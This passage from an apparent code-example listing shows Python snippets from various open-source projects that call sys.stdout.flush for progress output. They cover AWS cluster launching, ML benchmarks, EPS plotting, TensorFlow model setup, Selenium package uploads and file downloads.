	property list uchar int vertex_indices
	end_header'''

	##
	## a header with vertex colors
	##

	# header = '''ply
	# format ascii 1.0
	# element vertex '''+str(vertex_count)+'''
	# property float x
	# property float y
	# property float z
	# property uchar red
	# property uchar green
	# property uchar blue
	# element face '''+str(face_count)+'''
	# property list uchar int vertex_indices
	# end_header
	# '''


	line_prepend(OUTFILE, header)
	print("Wrote "+OUTFILE)

Example 29

Project: crunch.io-dashboard Source File: models.py
    def launch(self,msg=''):
        """
        In order to launch a ClusterInstance the following requirements must be
        satisfied:
            * A snapshot of the home volume must exist and be shared with the
              launching user (this should have been created at the
              ClusterTemplate creation time)
            * The user has AWS credentials including an ssh keypair.
            * A valid ClusterTemplate has been created.
        """
        from boto.ec2.connection import EC2Connection
        import scwrapper
        import random
        import time
        import datetime
        # FIXME: Add timestamps to logs.

        # Assigning Cluster Parameters
        aws_key_id     = self.cluster_template.user_profile.awscredential.aws_key_id
        aws_secret_key = self.cluster_template.user_profile.awscredential.aws_secret_key
        is_demo        = self.cluster_template.is_demo

        if ( not aws_key_id ) or ( not aws_secret_key ):
            raise 'AwsCredentialError'

        # Randomly selecting a us-east-1{a,b,c,d} availability zone
        # Maybe someday Amazon will give us capacity ideas
        availability_zone = 'us-east-1' + random.choice(('a','b','c','d'))

        # The availability zone needs to be saved for later actions on this
        # ClusterInstance
        self.availability_zone = availability_zone
        self.save()

        # Get latest_snapshot_id
        # TODO: When we support multiple disks, do this for all snapshots
        home_disk = self.cluster_template.disk_set.filter(name='Home')[0]
        latest_snapshot_id = home_disk.latest_snapshot_id
        size = int(home_disk.size)

        if is_demo:
            time.sleep(10)
            home_disk.home_volume_id = 'vol-aaaa1111'
            home_disk.save()
            self.cluster_template.status = 'running'
            self.cluster_template.save()
            print "DEMO: Launching cluster %s in availability zone %s" % \
                    ('demo-cluster', self.availability_zone)
            sys.stdout.flush()
        else:
            # create volume from snapshot in availability_zone
            print "Creating EBS volume from snapshot: %s" % latest_snapshot_id
            sys.stdout.flush()
            conn = EC2Connection(str(aws_key_id), str(aws_secret_key))
            volume = conn.create_volume( size, availability_zone, latest_snapshot_id)
            home_volume_id = volume.id

            # The home_volume_id needs to be saved for later.
            home_disk.home_volume_id = home_volume_id
            home_disk.save()

            star_cluster = scwrapper.Cluster(
                    self.cluster_template,
                    self.availability_zone,
                    )
            print "Launching cluster %s in availability zone %s" % \
                    (star_cluster.cluster_name, self.availability_zone)
            sys.stdout.flush()
            star_cluster.launch()
            sys.stdout.flush()
            self.cluster_template.status = 'running'
            self.cluster_template.save()

            print "Cluster started, saving nodes"
            sys.stdout.flush()
            
            # A new object must be created to get the updated node information.
            running_cluster = scwrapper.Cluster(
                    self.cluster_template,
                    self.availability_zone,
                    )

            # Create the Ec2Instance (Node) objects
            for node in running_cluster.sc.nodes:
                print "Saving node: %s, %s, %s" % ( 
                        node.alias,
                        node.ip_address,
                        node.id
                        )
                sys.stdout.flush()
                instance = Ec2Instance(
                    cluster_instance = self,
                    instance_type    = Ec2InstanceType.objects.filter(api_name = node.instance_type)[0],
                    alias            = node.alias,
                    arch             = node.arch,
                    instance_id      = node.id,
                    image_id         = node.image_id,
                    launch_time = datetime.datetime.strptime(
                        node.launch_time,
                        "%Y-%m-%dT%H:%M:%S.000Z"
                        ),
                    placement          = node.placement,
                    ip_address         = node.ip_address,
                    dns_name           = node.dns_name,
                    private_ip_address = node.private_ip_address,
                    public_dns_name    = node.public_dns_name,
                    state              = node.state
                )
                instance.save()
                print "Saved node: %s" % node.alias
                sys.stdout.flush()

            print "Launching of cluster completed."
            sys.stdout.flush()
 
        return "finished"

Example 30

Project: scikit-learn Source File: bench_plot_omp_lars.py
def compute_bench(samples_range, features_range):

    it = 0

    results = dict()
    lars = np.empty((len(features_range), len(samples_range)))
    lars_gram = lars.copy()
    omp = lars.copy()
    omp_gram = lars.copy()

    max_it = len(samples_range) * len(features_range)
    for i_s, n_samples in enumerate(samples_range):
        for i_f, n_features in enumerate(features_range):
            it += 1
            n_informative = n_features / 10
            print('====================')
            print('Iteration %03d of %03d' % (it, max_it))
            print('====================')
            # dataset_kwargs = {
            #     'n_train_samples': n_samples,
            #     'n_test_samples': 2,
            #     'n_features': n_features,
            #     'n_informative': n_informative,
            #     'effective_rank': min(n_samples, n_features) / 10,
            #     #'effective_rank': None,
            #     'bias': 0.0,
            # }
            dataset_kwargs = {
                'n_samples': 1,
                'n_components': n_features,
                'n_features': n_samples,
                'n_nonzero_coefs': n_informative,
                'random_state': 0
            }
            print("n_samples: %d" % n_samples)
            print("n_features: %d" % n_features)
            y, X, _ = make_sparse_coded_signal(**dataset_kwargs)
            X = np.asfortranarray(X)

            gc.collect()
            print("benchmarking lars_path (with Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            G = np.dot(X.T, X)  # precomputed Gram matrix
            Xy = np.dot(X.T, y)
            lars_path(X, y, Xy=Xy, Gram=G, max_iter=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            lars_gram[i_f, i_s] = delta

            gc.collect()
            print("benchmarking lars_path (without Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            lars_path(X, y, Gram=None, max_iter=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            lars[i_f, i_s] = delta

            gc.collect()
            print("benchmarking orthogonal_mp (with Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            orthogonal_mp(X, y, precompute=True,
                          n_nonzero_coefs=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            omp_gram[i_f, i_s] = delta

            gc.collect()
            print("benchmarking orthogonal_mp (without Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            orthogonal_mp(X, y, precompute=False,
                          n_nonzero_coefs=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            omp[i_f, i_s] = delta

    results['time(LARS) / time(OMP)\n (w/ Gram)'] = (lars_gram / omp_gram)
    results['time(LARS) / time(OMP)\n (w/o Gram)'] = (lars / omp)
    return results

Example 31

Project: roboto Source File: mecsolve.py
def mecrange(figtype):
    scale = 130
    eps_prologue(50, 110, 570, 630)
    print -50, 0, 'translate'
    print '0.5 setlinewidth'
    thlmin, thlmax = -pi/2, 2.4
    thrmin, thrmax = -2.2, pi / 2 + .2
    print 306 + scale * thlmin, 396, 'moveto', 306 + scale * thlmax, 396, 'lineto stroke'
    print 306, 396 + scale * thrmin, 'moveto', 306, 396 + scale * thrmax, 'lineto stroke'

    print 'gsave [2] 0 setdash'
    print 306, 396 + scale * pi / 2, 'moveto'
    print 306 + scale * thlmax, 396 + scale * pi / 2, 'lineto stroke'
    print 306 + scale * thlmin, 396 - scale * pi / 2, 'moveto'
    print 306 + scale * thlmax, 396 - scale * pi / 2, 'lineto stroke'
    print 306 + scale * pi / 2, 396 + scale * thrmin, 'moveto'
    print 306 + scale * pi / 2, 396 + scale * thrmax, 'lineto stroke'
    print 'grestore'

    print 306 + 3, 396 + scale * thrmax - 10, 'moveto'
    print '/Symbol 12 selectfont (q) show'
    print 0, -2, 'rmoveto'
    print '/Times-Italic 9 selectfont (right) show'

    print 306 - 18, 396 + scale * pi / 2 - 4, 'moveto'
    print '/Symbol 12 selectfont (p/2) show'
    print 306 + scale * 2.2, 396 - scale * pi / 2 + 2, 'moveto'
    print '/Symbol 12 selectfont (-p/2) show'

    print 306 + scale * pi/2 + 2, 396 + scale * thrmax - 10, 'moveto'
    print '/Symbol 12 selectfont (p/2) show'

    print 306 + scale * 2.2, 396 + 6, 'moveto'
    print '/Symbol 12 selectfont (q) show'
    print 0, -2, 'rmoveto'
    print '/Times-Italic 9 selectfont (left) show'

    print '/ss 0.8 def'
    print '/circle { ss 0 moveto currentpoint exch ss sub exch ss 0 360 arc } bind def'
    cmd = 'moveto'
    for i in range(0, 201):
        th = (i * .005 - .75 )* pi
        rmin = 1.5
        rmax = 2.5
        for j in range(20):
            r = (rmin + rmax) * .5
            th0 = r * cos(th)
            th1 = r * sin(th)
            if findmec(th0, th1) == None:
                rmax = r
            else:
                rmin = r
        r = (rmin + rmax) * .5
        th0 = r * cos(th)
        th1 = r * sin(th)
        print '%', r, th, th0, th1
        print 306 + scale * th0, 396 + scale * th1, cmd
        cmd = 'lineto'
        sys.stdout.flush()
    print 'stroke'
    sys.stdout.flush()
        
    for i in range(-11, 12):
        for j in range(-11, i + 1):
            th0, th1 = i * .196, j * .196
            print '%', th0, th1
            params = findmec(th0, th1)
            if params != None:
                sm, sp = params
                print 'gsave'
                print 306 + scale * th0, 396 + scale * th1, 'translate'
                uscale = 22
                k0, lam1, lam2 = justify_mec(sm, sp)
                xys, cost, x, y, th = run_elastica(-.5, .5, k0, lam1, lam2)
                cmdm = 'moveto'
                dx = xys[-1][0] - xys[0][0]
                dy = xys[-1][1] - xys[0][1]
                ch = hypot(dx, dy)
                chth = atan2(dy, dx)
                if figtype == 'mecrange':
                    print 'circle fill'
                    s = uscale * sin(chth) / ch
                    c = uscale * cos(chth) / ch
                    h = -xys[0][0] * s + xys[0][1] * c
                    for xy in xys:
                        print xy[0] * c + xy[1] * s, h + xy[0] * s - xy[1] * c, cmdm
                        cmdm = 'lineto'
                elif figtype == 'mecrangek':
                    ds = 1. / (len(xys) - 1)
                    sscale = 13. / ch
                    kscale = 3 * ch
                    print 'gsave .25 setlinewidth'
                    print sscale * -.5, 0, 'moveto', sscale, 0, 'rlineto stroke'
                    print 'grestore'
                    for l in range(len(xys)):
                        print sscale * (ds * l - 0.5), kscale * xys[l][2], cmdm
                        cmdm = 'lineto'
                print 'stroke'
                print 'grestore'
            sys.stdout.flush()
    print 'showpage'
    eps_trailer()

Example 32

Project: models Source File: swivel.py
  def __init__(self, config):
    """Construct graph for dmc."""
    self._config = config

    # Create paths to input data files
    print 'Reading model from:', config.input_base_path
    sys.stdout.flush()
    count_matrix_files = glob.glob(config.input_base_path + '/shard-*.pb')
    row_sums_path = config.input_base_path + '/row_sums.txt'
    col_sums_path = config.input_base_path + '/col_sums.txt'

    # Read marginals
    row_sums = read_marginals_file(row_sums_path)
    col_sums = read_marginals_file(col_sums_path)

    self.n_rows = len(row_sums)
    self.n_cols = len(col_sums)
    print 'Matrix dim: (%d,%d) SubMatrix dim: (%d,%d) ' % (
        self.n_rows, self.n_cols, config.submatrix_rows, config.submatrix_cols)
    sys.stdout.flush()
    self.n_submatrices = (self.n_rows * self.n_cols /
                          (config.submatrix_rows * config.submatrix_cols))
    print 'n_submatrices: %d' % (self.n_submatrices)
    sys.stdout.flush()

    # ===== CREATE VARIABLES ======

    with tf.device('/cpu:0'):
      # embeddings
      self.row_embedding = embeddings_with_init(
          embedding_dim=config.embedding_size,
          vocab_size=self.n_rows,
          name='row_embedding')
      self.col_embedding = embeddings_with_init(
          embedding_dim=config.embedding_size,
          vocab_size=self.n_cols,
          name='col_embedding')
      tf.histogram_summary('row_emb', self.row_embedding)
      tf.histogram_summary('col_emb', self.col_embedding)

      matrix_log_sum = math.log(np.sum(row_sums) + 1)
      row_bias_init = [math.log(x + 1) for x in row_sums]
      col_bias_init = [math.log(x + 1) for x in col_sums]
      self.row_bias = tf.Variable(row_bias_init,
                                  trainable=config.trainable_bias)
      self.col_bias = tf.Variable(col_bias_init,
                                  trainable=config.trainable_bias)
      tf.histogram_summary('row_bias', self.row_bias)
      tf.histogram_summary('col_bias', self.col_bias)

    # ===== CREATE GRAPH =====

    # Get input
    with tf.device('/cpu:0'):
      global_row, global_col, count = count_matrix_input(
          count_matrix_files, config.submatrix_rows, config.submatrix_cols)

      # Fetch embeddings.
      selected_row_embedding = tf.nn.embedding_lookup(self.row_embedding,
                                                      global_row)
      selected_col_embedding = tf.nn.embedding_lookup(self.col_embedding,
                                                      global_col)

      # Fetch biases.
      selected_row_bias = tf.nn.embedding_lookup([self.row_bias], global_row)
      selected_col_bias = tf.nn.embedding_lookup([self.col_bias], global_col)

    # Multiply the row and column embeddings to generate predictions.
    predictions = tf.matmul(
        selected_row_embedding, selected_col_embedding, transpose_b=True)

    # These binary masks separate zero from non-zero values.
    count_is_nonzero = tf.to_float(tf.cast(count, tf.bool))
    count_is_zero = 1 - tf.to_float(tf.cast(count, tf.bool))

    objectives = count_is_nonzero * tf.log(count + 1e-30)
    objectives -= tf.reshape(selected_row_bias, [config.submatrix_rows, 1])
    objectives -= selected_col_bias
    objectives += matrix_log_sum

    err = predictions - objectives

    # The confidence function scales the L2 loss based on the raw co-occurrence
    # count.
    l2_confidence = (config.confidence_base + config.confidence_scale * tf.pow(
        count, config.confidence_exponent))

    l2_loss = config.loss_multiplier * tf.reduce_sum(
        0.5 * l2_confidence * err * err * count_is_nonzero)

    sigmoid_loss = config.loss_multiplier * tf.reduce_sum(
        tf.nn.softplus(err) * count_is_zero)

    self.loss = l2_loss + sigmoid_loss

    tf.scalar_summary("l2_loss", l2_loss)
    tf.scalar_summary("sigmoid_loss", sigmoid_loss)
    tf.scalar_summary("loss", self.loss)

    # Add optimizer.
    self.global_step = tf.Variable(0, name='global_step')
    opt = tf.train.AdagradOptimizer(config.learning_rate)
    self.train_op = opt.minimize(self.loss, global_step=self.global_step)
    self.saver = tf.train.Saver(sharded=True)

Example 33

Project: AI_Reader Source File: build_imagenet_data.py
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      synset = synsets[i]
      human = humans[i]
      bbox = bboxes[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    synset, human, bbox,
                                    height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()

Example 34

Project: CumulusCI Source File: package_upload.py
    def build_package(self, build_name):
        """ Builds a managed package by calling SauceLabs via Selenium to click the Upload button """ 
        # Update Status
        print 'Starting browser'
        sys.stdout.flush()

        try:
            driver = self.get_selenium()
        except:
            print "Sleeping 5 more seconds to try again.  Last attempt to connect to Selenium failed"
            sleep(5)
            driver = self.get_selenium()

        driver.implicitly_wait(90) # seconds

        # Load the packages list page
        sleep(5) # Not sure why this sleep is necessary, but it seems to be
        driver.get('%s/0A2' % self.instance_url)

        # Update Status
        print 'Loaded package listing page'
        sys.stdout.flush()

        # Click the link to the package
        driver.find_element_by_xpath("//th[contains(@class,'dataCell')]/a[text()='%s']" % self.package).click()

        # Update Status
        print 'Loaded package page'
        sys.stdout.flush()

        # Click the Upload button to open the upload form
        driver.find_element_by_xpath("//input[@class='btn' and @value='Upload']").click()

        # Update Status
        print 'Loaded Upload form'
        sys.stdout.flush()

        # Populate and submit the upload form to create a beta managed package
        name_input = driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsBlockSection:VersionInfoSectionItem:VersionText')
        name_input.clear()
        name_input.send_keys(build_name)
        driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsPageBlockButtons:bottom:upload').click()

        # Update Status
        print 'Upload Submitted'
        sys.stdout.flush()

        # Monitor the package upload progress
        retry_count = 0
        last_status = None
        while True:
            try:
                status_message = driver.find_element_by_css_selector('.messageText').text
            except selenium.common.exceptions.StaleElementReferenceException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                sleep(1)
                continue
            except selenium.common.exceptions.NoSuchElementException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                if retry_count > 15:
                    print ".messageText not found after 15 retries"
                    break
                sleep(1)
                retry_count += 1
                continue

            retry_count = 0

            if status_message.startswith('Upload Complete'):
                # Update Status
                print status_message
                sys.stdout.flush()
    
                # Get the version number and install url
                version = driver.find_element_by_xpath("//th[text()='Version Number']/following-sibling::td/span").text
                install_url = driver.find_element_by_xpath("//a[contains(@name, ':pkgInstallUrl')]").get_attribute('href')
            
                self.version = version
                self.install_url = install_url
    
                break

            if status_message.startswith('Upload Failed'):
                print status_message
                sys.stdout.flush()
                break 

            # Update Status
            if status_message != last_status:
                print status_message
                sys.stdout.flush()
            last_status = status_message

            sleep(1)

        driver.quit()    

Example 35

Project: lime-experiments Source File: generate_data_for_compare_classifiers.py
def main():
  parser = argparse.ArgumentParser(description='Evaluate some explanations')
  parser.add_argument('--dataset', '-d', type=str, required=True,help='dataset name')
  parser.add_argument('--output_folder', '-o', type=str, required=True, help='output folder')
  parser.add_argument('--num_features', '-k', type=int, required=True, help='num features')
  parser.add_argument('--num_rounds', '-r', type=int, required=True, help='num rounds')
  parser.add_argument('--start_id',  '-i', type=int, default=0,required=False, help='output start id')
  args = parser.parse_args()
  dataset = args.dataset
  train_data, train_labels, test_data, test_labels, class_names = LoadDataset(dataset)
  rho = 25
  kernel = lambda d: np.sqrt(np.exp(-(d**2) / rho ** 2))
  local = explainers.GeneralizedLocalExplainer(kernel, explainers.data_labels_distances_mapping_text, num_samples=15000, return_mean=True, verbose=False, return_mapped=True)
  # Found through cross validation
  sigmas = {'multi_polarity_electronics': {'neighbors': 0.75, 'svm': 10.0, 'tree': 0.5,
  'logreg': 0.5, 'random_forest': 0.5, 'embforest': 0.75},
  'multi_polarity_kitchen': {'neighbors': 1.0, 'svm': 6.0, 'tree': 0.75,
  'logreg': 0.25, 'random_forest': 6.0, 'embforest': 1.0},
  'multi_polarity_dvd': {'neighbors': 0.5, 'svm': 0.75, 'tree': 8.0, 'logreg':
  0.75, 'random_forest': 0.5, 'embforest': 5.0}, 'multi_polarity_books':
  {'neighbors': 0.5, 'svm': 7.0, 'tree': 2.0, 'logreg': 1.0, 'random_forest':
  1.0, 'embforest': 3.0}}
  parzen1 = parzen_windows.ParzenWindowClassifier()
  parzen1.sigma = sigmas[dataset]['random_forest']
  parzen2 = parzen_windows.ParzenWindowClassifier()
  parzen2.sigma = sigmas[dataset]['random_forest']
  random = explainers.RandomExplainer()

  for Z in range(args.num_rounds):
    exps1 = {}
    exps2 = {}
    explainer_names = ['lime', 'parzen', 'random', 'greedy', 'mutual']
    for expl in explainer_names:
      exps1[expl] = []
      exps2[expl] = []
    print 'Round', Z
    sys.stdout.flush()
    fake_features_z = [([.1, .2], [.1,.1], 10)]#, ([.2, .1], [.1,.1], 10)]
    clean_train, dirty_train, clean_test = corrupt_dataset(fake_features_z, train_data, train_labels, test_data, test_labels)
    vectorizer = CountVectorizer(lowercase=False, binary=True) 
    dirty_train_vectors = vectorizer.fit_transform(dirty_train)
    clean_train_vectors = vectorizer.transform(clean_train)
    test_vectors = vectorizer.transform(clean_test)
    terms = np.array(list(vectorizer.vocabulary_.keys()))
    indices = np.array(list(vectorizer.vocabulary_.values()))
    inverse_vocabulary = terms[np.argsort(indices)]
    tokenizer = vectorizer.build_tokenizer()  
    c1 = ensemble.RandomForestClassifier(n_estimators=30, max_depth=5)
    c2 = ensemble.RandomForestClassifier(n_estimators=30, max_depth=5)
    untrustworthy = [i for i, x in enumerate(inverse_vocabulary) if x.startswith('FAKE')]
    train_idx, test_idx = tuple(cross_validation.ShuffleSplit(dirty_train_vectors.shape[0], 1, 0.2))[0]
    train_acc1 = train_acc2 = test_acc1 = test_acc2 = 0
    print 'Trying to find trees:'
    sys.stdout.flush()
    iteration = 0
    found_tree = True
    while np.abs(train_acc1 - train_acc2) > 0.001 or np.abs(test_acc1 - test_acc2) < 0.05: 
      iteration += 1
      c1.fit(dirty_train_vectors[train_idx], train_labels[train_idx])
      c2.fit(dirty_train_vectors[train_idx], train_labels[train_idx])
      train_acc1 = accuracy_score(train_labels[test_idx], c1.predict(dirty_train_vectors[test_idx]))
      train_acc2 = accuracy_score(train_labels[test_idx], c2.predict(dirty_train_vectors[test_idx]))
      test_acc1 = accuracy_score(test_labels, c1.predict(test_vectors))
      test_acc2 = accuracy_score(test_labels, c2.predict(test_vectors))
      if iteration == 3000:
        found_tree = False
        break
    if not found_tree:
      print 'skipping iteration', Z
      continue
    print 'done'
    print 'Train acc1:', train_acc1, 'Train acc2:', train_acc2
    print 'Test acc1:', test_acc1, 'Test acc2:', test_acc2
    sys.stdout.flush()
    predictions = c1.predict(dirty_train_vectors)
    predictions2 = c2.predict(dirty_train_vectors)
    predict_probas = c1.predict_proba(dirty_train_vectors)[:,1]
    predict_probas2 = c2.predict_proba(dirty_train_vectors)[:,1]
    cv_preds1 = cross_validation.cross_val_predict(c1, dirty_train_vectors[train_idx], train_labels[train_idx], cv=5)
    cv_preds2 = cross_validation.cross_val_predict(c2, dirty_train_vectors[train_idx], train_labels[train_idx], cv=5)
    parzen1.fit(dirty_train_vectors[train_idx], cv_preds1)
    parzen2.fit(dirty_train_vectors[train_idx], cv_preds2)
    pp = []
    pp2 = []
    true_labels = []
    iteration = 0
    for i in test_idx:
      if iteration % 50 == 0:
        print iteration
        sys.stdout.flush()
      iteration += 1
      pp.append(predict_probas[i])
      pp2.append(predict_probas2[i])
      true_labels.append(train_labels[i])
      exp, mean = local.explain_instance(dirty_train_vectors[i], 1, c1.predict_proba, args.num_features)
      exps1['lime'].append((exp, mean))

      exp = parzen1.explain_instance(dirty_train_vectors[i], 1, c1.predict_proba, args.num_features, None) 
      mean = parzen1.predict_proba(dirty_train_vectors[i])[1]
      exps1['parzen'].append((exp, mean))

      exp = random.explain_instance(dirty_train_vectors[i], 1, None, args.num_features, None)
      exps1['random'].append(exp)

      exp = explainers.explain_greedy_martens(dirty_train_vectors[i], predictions[i], c1.predict_proba, args.num_features)
      exps1['greedy'].append(exp)


      # Classifier 2
      exp, mean = local.explain_instance(dirty_train_vectors[i], 1, c2.predict_proba, args.num_features)
      exps2['lime'].append((exp, mean))

      exp = parzen2.explain_instance(dirty_train_vectors[i], 1, c2.predict_proba, args.num_features, None) 
      mean = parzen2.predict_proba(dirty_train_vectors[i])[1]
      exps2['parzen'].append((exp, mean))

      exp = random.explain_instance(dirty_train_vectors[i], 1, None, args.num_features, None)
      exps2['random'].append(exp)

      exp = explainers.explain_greedy_martens(dirty_train_vectors[i], predictions2[i], c2.predict_proba, args.num_features)
      exps2['greedy'].append(exp)

    out = {'true_labels' : true_labels, 'untrustworthy' : untrustworthy, 'train_acc1' :  train_acc1, 'train_acc2' : train_acc2, 'test_acc1' : test_acc1, 'test_acc2' : test_acc2, 'exps1' : exps1, 'exps2': exps2, 'predict_probas1': pp, 'predict_probas2': pp2}
    pickle.dump(out, open(os.path.join(args.output_folder, 'comparing_%s_%s_%d.pickle' % (dataset, args.num_features, Z + args.start_id)), 'w'))

Example 36

Project: pokedex Source File: load.py
def _get_verbose_prints(verbose):
    """If `verbose` is true, returns three functions: one for printing a
    starting message, one for printing an interim status update, and one for
    printing a success or failure message when finished.

    If `verbose` is false, returns no-op functions.
    """

    if not verbose:
        # Return dummies
        def dummy(*args, **kwargs):
            pass

        return dummy, dummy, dummy

    ### Okay, verbose == True; print stuff

    def print_start(thing):
        # Truncate to 66 characters, leaving 10 characters for a success
        # or failure message
        truncated_thing = thing[:66]

        # Also, space-pad to keep the cursor in a known column
        num_spaces = 66 - len(truncated_thing)

        print("%s...%s" % (truncated_thing, ' ' * num_spaces), end='')
        sys.stdout.flush()

    if sys.stdout.isatty():
        # stdout is a terminal; stupid backspace tricks are OK.
        # Don't use print, because it always adds magical spaces, which
        # makes backspace accounting harder

        backspaces = [0]
        def print_status(msg):
            # Overwrite any status text with spaces before printing
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(' ' * backspaces[0])
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(msg)
            sys.stdout.flush()
            backspaces[0] = len(msg)

        def print_done(msg='ok'):
            # Overwrite any status text with spaces before printing
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(' ' * backspaces[0])
            sys.stdout.write('\b' * backspaces[0])
            sys.stdout.write(msg + "\n")
            sys.stdout.flush()
            backspaces[0] = 0

    else:
        # stdout is a file (or something); don't bother with status at all
        def print_status(msg):
            pass

        def print_done(msg='ok'):
            print(msg)

    return print_start, print_status, print_done

Example 37

Project: acousticbrainz-server Source File: job_calc.py
Function: main
def main(num_threads, profile, dataset_job_id):
    print("High-level extractor daemon starting with %d threads" % num_threads)
    sys.stdout.flush()
    build_sha1 = get_build_sha1(HIGH_LEVEL_EXTRACTOR_BINARY)
    create_profile(profile, PROFILE_CONF, build_sha1)
    db.init_db_engine(config.SQLALCHEMY_DATABASE_URI)

    model_id = get_model_from_eval(dataset_job_id)
    includes = load_includes_from_eval(dataset_job_id)

    num_processed = 0

    pool = {}
    docs = []
    while True:
        # Check to see if we need more database rows
        if len(docs) == 0:
            # Fetch more rows from the DB
            docs = db.data.get_unprocessed_highlevel_docuements_for_model(model_id, includes)

            # We will fetch some rows that are already in progress. Remove those.
            in_progress = pool.keys()
            filtered = []
            for mbid, doc, id in docs:
                if id not in in_progress:
                    filtered.append((mbid, doc, id))
            docs = filtered

        if len(docs):
            # Start one docuement
            mbid, doc, id = docs.pop()
            th = HighLevel(mbid, doc, id)
            th.start()
            print("start %s" % id)
            sys.stdout.flush()
            pool[id] = th

        # If we're at max threads, wait for one to complete
        while True:
            if len(pool) == 0 and len(docs) == 0:
                if num_processed > 0:
                    print("processed %s docuements, none remain. Sleeping." % num_processed)
                    sys.stdout.flush()
                num_processed = 0
                # Let's be nice and not keep any connections to the DB open while we nap
                # TODO: Close connections when we're sleeping
                sleep(SLEEP_DURATION)

            for id in pool.keys():
                if not pool[id].is_alive():

                    # Fetch the data and clean up the thread object
                    hl_data = pool[id].get_data()
                    ll_id = pool[id].get_ll_id()
                    pool[id].join()
                    del pool[id]

                    try:
                        jdata = json.loads(hl_data)
                    except ValueError:
                        print("error %s: Cannot parse result docuement" % mbid)
                        print(hl_data)
                        sys.stdout.flush()
                        jdata = {}

                    db.data.write_high_level(mbid, ll_id, jdata, build_sha1)

                    print("done  %s" % id)
                    sys.stdout.flush()
                    num_processed += 1

            if len(pool) == num_threads:
                # tranquilo!
                sleep(.1)
            else:
                break

Example 38

Project: nrvr-commander Source File: download.py
    @classmethod
    def fromUrl(cls, url,
                force=False,
                dontDownload=False,
                ticker=True):
        """Download file or use previously downloaded file.
        
        As implemented uses urllib2.
        
        dontDownload
            whether you don't want to start a download, for some reason.
        
        Return file path."""
        urlFilename = cls.basename(url)
        downloadDir = ScriptUser.loggedIn.userHomeRelative("Downloads")
        downloadPath = os.path.join(downloadDir, urlFilename)
        semaphorePath = downloadPath + cls.semaphoreExtenstion
        #
        if os.path.exists(downloadPath) and not force:
            if not os.path.exists(semaphorePath):
                # file exists and not download in progress,
                # assume it is good
                return downloadPath
            else:
                # file exists and download in progress,
                # presumably from another script running in another process or thread,
                # wait for it to complete
                printed = False
                ticked = False
                # check the essential condition, initially and then repeatedly
                while os.path.exists(semaphorePath):
                    if not printed:
                        # first time only printing
                        print "waiting for " + semaphorePath + " to go away on completion"
                        sys.stdout.flush()
                        printed = True
                    if ticker:
                        if not ticked:
                            # first time only printing
                            sys.stdout.write("[")
                        sys.stdout.write(".")
                        sys.stdout.flush()
                        ticked = True
                    time.sleep(5)
                if ticked:
                    # final printing
                    sys.stdout.write("]\n")
                    sys.stdout.flush()
        elif not dontDownload: # it is normal to download
            if not os.path.exists(downloadDir): # possibly on an international version OS
                try:
                    os.makedirs(downloadDir)
                except OSError:
                    if os.path.exists(downloadDir): # concurrently made
                        pass
                    else: # failure
                        raise
            #
            # try downloading
            pid = os.getpid()
            try:
                with open(semaphorePath, "w") as semaphoreFile:
                    # create semaphore file
                    semaphoreFile.write("pid=" + str(pid))
                #
                print "looking for " + url
                # open connection to server
                urlFileLikeObject = urllib2.urlopen(url)
                with open(downloadPath, "wb") as downloadFile:
                    print "starting to download " + url
                    if ticker:
                        sys.stdout.write("[")
                    # was shutil.copyfileobj(urlFileLikeObject, downloadFile)
                    try:
                        while True:
                            data = urlFileLikeObject.read(1000000)
                            if not data:
                                break
                            downloadFile.write(data)
                            if ticker:
                                sys.stdout.write(".")
                                sys.stdout.flush()
                    finally:
